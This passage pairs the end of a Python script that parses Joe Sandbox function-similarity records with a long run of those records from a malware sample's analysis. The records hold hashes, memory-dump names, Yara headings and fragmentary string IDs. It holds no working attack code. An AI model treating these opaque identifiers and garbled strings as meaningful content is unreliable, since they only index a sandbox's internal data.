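• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
• String ID:
• API String ID: 3072701918-0
• Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
"""

# Line shapes as they appear in the listing (assumed; covers only what is visible here).
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function ([0-9A-Fa-f]+):\s+)?"  # optional callee
    r"(\w+)\.(\w+)"                                             # API.MODULE
    r"(?:\(([^)]*)\))?"                                         # optional (args)
    r",?\s+ref:\s+([0-9A-Fa-f]+)\s*$")                          # call-site address
KV_RE = re.compile(r"^\s*•\s+([^:]+?):\s*(.*?)\s*$")

# Windows SDK constants for the two arguments the listing leaves numeric.
CSIDL = {0x10: "CSIDL_DESKTOPDIRECTORY"}       # shlobj.h
COINIT = {0x2: "COINIT_APARTMENTTHREADED"}     # objbase.h
SYMBOLIC_ARGS = {"SHGetSpecialFolderPathW": (2, CSIDL),  # (argument index, table)
                 "CoInitializeEx": (1, COINIT)}

@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple             # tokens as printed; '?' means the sandbox did not resolve it
    ref: int                # address of the call site
    subcall_of: int | None  # callee address when the API is reached through a subcall

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # key/value lines of the other sections

def parse_record(text: str) -> FunctionRecord:
    rec, section = FunctionRecord(), None
    for line in text.splitlines():
        if not line.strip():
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            sub, name, mod, args, ref = m.groups()
            rec.apis.append(ApiCall(
                name, mod,
                tuple(a.strip() for a in args.split(",")) if args else (),
                int(ref, 16), int(sub, 16) if sub else None))
        elif (m := KV_RE.match(line)):
            rec.meta[m.group(1)] = m.group(2)
        else:
            section = line.strip()   # bare heading: "APIs", "Similarity", ...
    return rec

def dump_base(rec: FunctionRecord) -> int:
    """Base address of the memory dump the record was lifted from (-1 if absent)."""
    m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rec.meta.get("Source File", ""))
    return int(m.group(1), 16) if m else -1

def annotate(call: ApiCall) -> str:
    """Render a call as MODULE!Name(args) @ ref, naming known constants."""
    spec = SYMBOLIC_ARGS.get(call.name)
    parts = []
    for i, tok in enumerate(call.args):
        if spec and i == spec[0] and tok != "?":
            parts.append(spec[1].get(int(tok, 16), tok))
        else:
            parts.append(tok)
    where = f"{call.ref:08X}"
    if call.subcall_of is not None:
        where += f" (via {call.subcall_of:08X})"
    return f"{call.module}!{call.name}({', '.join(parts)}) @ {where}"

if __name__ == "__main__":
    record = parse_record(SAMPLE_RECORD)
    base = dump_base(record)
    print(f"dump base {base:08X}, {len(record.apis)} call sites, "
          f"all inside dump: {all(c.ref >= base for c in record.apis)}")
    for call in record.apis:
        print(annotate(call))
```

Running the module prints one annotated line per call site, for example `SHELL32!SHGetSpecialFolderPathW(00000000, ?, CSIDL_DESKTOPDIRECTORY, 00000000) @ 020F8C42`. Because `parse_record` returns the data rather than printing it, records from several reports can be keyed on `API String ID` or `Opcode Fuzzy Hash` to group functions across samples.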
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: )G+I$+K M$B~B$|B$s0u
• API String ID: 0-2670551875
• Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
• Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
• Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
• Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: KT$Q$SV$p8`;$xy
• API String ID: 0-2575762000
• Opcode ID: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
• Instruction ID: 3b7dbb0080983c64d0afedf1087b069b8568109c666cafaa17ec66de9aea0152
• Opcode Fuzzy Hash: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
• Instruction Fuzzy Hash: A491FFB695C3549FD304DF56C88155FBBE2FFC5304F19896DE8C88B241EA358A098BC6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: "$-+$/$hI
• API String ID: 0-2772680581
• Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
• Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
• Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
• Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: "$-+$/$hI
• API String ID: 0-2772680581
• Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
• Instruction ID: 69eab17d462887fc1b1d2bc46861407332f066c656d8a290f74a8c393c1dfcb8
• Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
• Instruction Fuzzy Hash: 7042377054C3818FC725CF25C880A6EBBE1AF91314F188A6CE8E55B3D2DB76D906CB52
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0u4w$_q$qr$xy
• API String ID: 0-1225007230
• Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
• Instruction ID: 29d75b96ad340c1db2b543b868fba93e6a55eeb62e6dc3ca35ca9c9b524122f4
• Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
• Instruction Fuzzy Hash: 6F9103B19483118BC718CF98D8D276BB7F1EF95324F08996CE8CA8B391E3B49505C756
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
• API String ID: 0-909542228
• Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
• Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
• Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
• Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                                • Instruction ID: fbb517b05a9b8848c00c41dde374d2e50801e3fb5a424da556ed578732c22c6a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92916971A8C3918BE3348B3984517ABBBD29FD3314F29896DC4D99B382CB754409CB93
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                • Instruction ID: c1b0c4405b8c15786069570b4c0fe2bb62c27a621c6302b7aaf56f53fcf3363f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB916A71A8C3D18BE3348B3984517ABBBD29FD3214F29896DC4D99B682CB754409CB93
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                • Instruction ID: 36397b7e55a883d6b87c5cd0a7d65654782b6574d78f41d388baed68983f9f9d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B917971A4C3D18BE3348B3984517ABBBD2AFD3314F28896DD4D99B682CB754409CB93
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                • API String ID: 0-909542228
                                                                                                                                                                                                                                                                • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                • Instruction ID: 459fd79cac7b3ca90d0cc701004315c693055f310fd5318d386fc34bb6f4def2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A8157729483D08FE3348F3988507ABBBD2AFE3204F29896DC4D95B682C7754409CB93
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: /G$I$7N1@$Fg)i${\}
                                                                                                                                                                                                                                                                • API String ID: 0-149357369
                                                                                                                                                                                                                                                                • Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                                • Instruction ID: adfd10be52cf66e349c3f9ebf5e4baaa487f184ef0fe8a27018f625dd380e623
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8321B8B55593809BC314CF66884161BFBE2BBD2704F29A92CE0C85B254D3748902CF8B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: ,$i$r}A
                                                                                                                                                                                                                                                                • API String ID: 2994545307-2114006112
                                                                                                                                                                                                                                                                • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                                                                                                                                                                                • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: gfff$i$r}A
                                                                                                                                                                                                                                                                • API String ID: 0-3931832132
                                                                                                                                                                                                                                                                • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                                                                                                                                                                                • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: <pr$st$y./
                                                                                                                                                                                                                                                                • API String ID: 0-3839595785
                                                                                                                                                                                                                                                                • Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                                                                                                                                                                                • Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: <pr$st$y./
                                                                                                                                                                                                                                                                • API String ID: 0-3839595785
                                                                                                                                                                                                                                                                • Opcode ID: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                                                                                                                                                                                                                                                • Instruction ID: 7676cd6c6d452e7f6ea5ef86fdbb70807a0855253111ee150c956dcafde4b5fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e143f35872cbb7a2f64fee134240a1c59abbcbee3e9395d2d3f1030c864cd5b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28C15972A883214BD7289F24C852B6BB3E2EFD5314F19853DED9687781E374D805C792
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 34$C]$|F
                                                                                                                                                                                                                                                                • API String ID: 0-2804560523
                                                                                                                                                                                                                                                                • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                                                                                                                                                                                • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #XXL$=$BC
                                                                                                                                                                                                                                                                • API String ID: 0-2546488661
                                                                                                                                                                                                                                                                • Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                                                                                                                                                                                • Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: 1234$oQ3$sQ3
                                                                                                                                                                                                                                                                • API String ID: 2994545307-3057079318
                                                                                                                                                                                                                                                                • Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                                                                                                                                                                                • Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: 12347$oQ3$sQ3
• API String ID: 0-1755585375
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: Ef$TQ][$sWK)
• API String ID: 0-3401374238
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: Ef$TQ][$sWK)
• API String ID: 0-3401374238
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: +|-~$/pqr$_
• API String ID: 0-1379640984
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: +|-~$/pqr$_
• API String ID: 0-1379640984
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
Strings
Memory Dump Source
